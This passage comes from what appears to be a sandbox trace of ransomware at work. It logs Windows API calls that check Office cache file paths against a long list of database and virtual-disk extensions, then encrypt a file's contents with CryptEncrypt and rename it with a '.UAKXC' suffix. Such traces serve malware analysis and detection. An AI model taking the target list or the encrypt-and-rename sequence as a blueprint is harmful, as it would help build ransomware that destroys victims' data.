lpSrch=".sdf") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sis") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".spq") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sql") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sqlite") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sqlite3") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".te") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".temx") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".tmd") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".tps") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".trc") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".trm") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".udb") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".udl") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".usr") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".v12") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vis") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vpd") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vvv") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".wdb") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".wmdb") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".wrk") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".xdb") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".xld") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".xmlff") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".abcddb") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".abs") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".abx") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accdw") returned 0x0 [0148.250] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".adn") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".db2") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fm5") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".hjt") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".icg") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".icr") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".kdb") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".lut") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".maw") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mdn") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mdt") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vdi") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vhd") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmdk") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".pvm") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmem") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmsn") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmsd") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nvram") returned 0x0 [0148.251] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmx") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".raw") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".qcow2") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".subvol") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".bin") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vsv") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".avhd") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmrs") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vhdx") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".avdx") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".vmcx") returned 0x0 [0148.252] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".iso") returned 0x0 [0148.252] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.252] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0148.475] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0148.475] SetEndOfFile (hFile=0x6f0) returned 1 [0148.475] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.476] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x5aa, lpOverlapped=0x0) returned 1 [0148.476] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.476] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x5aa, lpOverlapped=0x0) returned 1 [0148.476] CloseHandle (hObject=0x6f0) returned 1 [0148.479] GetProcessHeap () returned 0xea0000 [0148.479] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0148.479] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0148.479] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.UAKXC" [0148.479] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.uakxc")) returned 1 [0148.480] GetProcessHeap () returned 0xea0000 [0148.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0148.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5770 | out: hHeap=0xea0000) returned 1 [0148.481] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeabf0 | out: hHeap=0xea0000) returned 1 [0148.481] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0148.481] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0148.481] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0148.482] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0148.482] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0148.482] GetLastError () returned 0x0 [0148.482] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=9958388) returned 1 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".4dd") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".4dl") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accdb") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accdc") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accde") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accdr") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accdt") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".accft") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".adb") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ade") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".adf") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".adp") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".arc") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ora") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".alf") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ask") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".btr") returned 0x0 [0148.483] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".bdf") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".cat") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".cdb") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ckp") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".cma") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".cpd") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dacpac") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dad") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dadiagrams") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".daschema") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".db") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".db-shm") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".db-wal") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".db3") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbc") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbf") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbs") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbt") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbv") returned 0x0 [0148.484] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dbx") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dcb") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dct") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dcx") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ddl") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dlis") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dp1") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dqy") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dsk") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dsn") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dtsx") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".dxl") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".eco") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ecx") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".edb") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".epim") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".exb") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fcd") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fdb") returned 0x0 [0148.485] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fic") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fmp") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fmp12") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fmpsl") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fol") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fp3") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fp4") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fp5") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fp7") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".fpt") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".frm") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".gdb") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".grdb") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".gwi") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".hdb") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".his") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ib") returned 0x0 [0148.486] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".idb") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".ihx") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".itdb") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".itw") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".jet") returned 0x0 [0148.487] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpSrch=".jtx") returned 0x0 [0148.487] StrStrIW 